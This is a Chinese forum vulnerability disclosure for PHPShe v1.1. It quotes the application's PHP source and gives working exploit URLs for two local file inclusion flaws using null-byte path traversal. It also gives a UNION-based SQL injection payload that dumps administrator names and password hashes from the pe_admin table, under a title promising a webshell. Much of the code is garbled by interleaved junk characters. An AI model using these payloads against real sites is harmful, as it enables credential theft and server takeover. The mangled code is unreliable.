phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin · 发表于 2013-4-19 19:01:54

/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
if (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞

//首页文件
pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php"); //$mod可控造成“鸡肋”包含漏洞
pe_result();
?>
//common 文件第15行开始
url路由配置
$module = $mod = $act = 'index';
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

& Q' C9 X! f& X9 V5 \
0×02 搜索注入) W c( M) D% ] a4 X0 Y
9 {" Q4 R6 u% z! T
<code id="code2">

//product.php文件4 T5 ?9 E  u' ]0 v
case 'list':6 l- A8 C$ R* A, Y6 D
$category_id = intval($id);
) W6 t( [' H- a/ y/ A: N0 i5 G+ N% J; r$info = $db->pe_select('category', array('category_id'=>$category_id));
4 A6 N* l7 B2 s8 ?0 Y% R* j//搜索! V3 O* m& u' @& ?: ~: B9 d
$sqlwhere = " and `product_state` = 1";' o, [3 E, u+ _
pe_lead('hook/category.hook.php');
! }' J! E) k7 D2 Y* Z) h( @; V$ xif ($category_id) {
4 S# S) @( ^0 C8 c+ ?' rwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";8 Q6 V! r$ N9 u/ z# S+ n* }
}
# m3 E* e* o4 \, F& o' s$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
- N! Z6 O6 O$ E. y) e/ U& {if ($_g_orderby) {$ J; a+ H- _2 ~
$orderby = explode('_', $_g_orderby);
; c6 ?- P8 Z9 P1 [2 ~  P* G& B1 `; @$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";+ u7 S% `7 `* y3 i. |& ^- u. A
}
6 Z$ t9 U  f7 [9 Q- A) N- q8 Q( Uelse {
  M  y' J+ ^5 x/ h$sqlwhere .= " order by `product_id` desc";! q: q* r: V8 ^9 }
}
! I/ Y5 j/ ]( s4 D% A% h- X( k$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
/ A0 F2 u0 g- B3 J//热卖排行
9 K9 \; B2 _8 k+ Y9 g$ Q1 @7 U$product_hotlist = product_hotlist();
9 T) f9 ?& x% V7 N2 F+ N//当前路径5 l* a8 ~& M8 E  y7 h7 x
$nowpath = category_path($category_id);3 [4 k, M6 }. W# Q
$seo = pe_seo($info['category_name']);+ N' n0 {. t/ e' U1 E
include(pe_tpl('product_list.html'));5 V* o$ Y/ r3 }6 X
//跟进selectall函数库
/ h) s# P) q1 [9 j, f5 H$ Kpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
/ x2 C4 r: u8 h3 |9 `{
2 d( N9 Z# P9 v8 O' P( }//处理条件语句/ I$ _% P$ F* N' g8 D# f* C
$sqlwhere = $this->_dowhere($where);
; y0 N* s' C: D4 f% y" \$ [8 B/ Ereturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
* E+ d2 O; e' r$ x+ j}+ J4 }5 R4 Y0 n1 @& t
//exp$ |! n, o- B! k4 X* }
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
. Z. }" X. f$ p' }

</code>
% F! _; A3 S: y7 s1 T. ]
' F- j. M R7 n$ G" D0×03 包含漏洞2
& M# P, P5 \) w7 |* C( g2 Z
+ n0 O( Z5 Y6 O* P<code id="code3">

//order.php

case 'pay':

/ Y1 ~3 p/ |* \: O" P8 Z0 c5 c. j
$order_id = pe_dbhold($_g_id);

6 w- }; i; c4 I/ y3 b5 R
$cache_payway = cache::get('payway');

. b _6 D' N# ^
foreach($cache_payway as $k => $v) {

/ K7 z# _+ n9 M q) w. L- A, X
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

4 D. Z& J. b/ D1 P- s t* `2 M
if ($k == 'bank') {

3 V$ e5 {% u: U) A) y( m
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

; ?6 Z6 y2 A3 T3 y% o' H
}

5 B4 M, H. ^: u8 h8 \! T0 _3 u}

) `# W+ f" |3 r( E' ?
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

$ ^- S K0 p3 c2 E) h& j+ `; F% X!$order['order_id'] && pe_error('订单号错误...');

* r$ o7 L* B& c- X& m4 w2 B
if (isset($_p_pesubmit)) {

c5 ^) B/ ^4 U& ?
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

0 t% S6 z' a$ z" g. F/ }$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

& W/ X. _/ P9 _: h" O0 L
foreach ($info_list as $v) {

2 Z8 }, y8 P& _. ~" X. S7 @8 h& X
$order['order_name'] .= "{$v['product_name']};";
' \/ ?) _6 N7 I. R$ f5 @2 l

$ V, T0 r/ @& V7 {5 J6 [ L+ ~5 {}

- @& {! s$ e! S
echo '正在为您连接支付网站，请稍后...';

! |2 n3 c! g; N5 ^' Z, R0 Q' n$ @
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

- i0 K( I" t$ o# }) P
}//当一切准备好的时候就可以进行"鸡肋包含了"

" O6 a- v" J* L
else {

0 R: h4 {, `4 L; V6 J. e- k
pe_error('支付错误...');

" r A0 t t" T X' U4 \# `; j}

. O& C1 E; q% S% ]0 d. z5 d6 J. N, F
}

+ y4 Q+ i* q; q6 K& [+ Q; p
$seo = pe_seo('选择支付方式');

8 z! w1 Y6 y& B- oinclude(pe_tpl('order_pay.html'));

N- b6 c" R. R8 r5 m& dbreak;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
8 \) Y6 ]# }0 C" e8 r

		自动登录	找回密码
密码			立即注册

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

浏览过的版块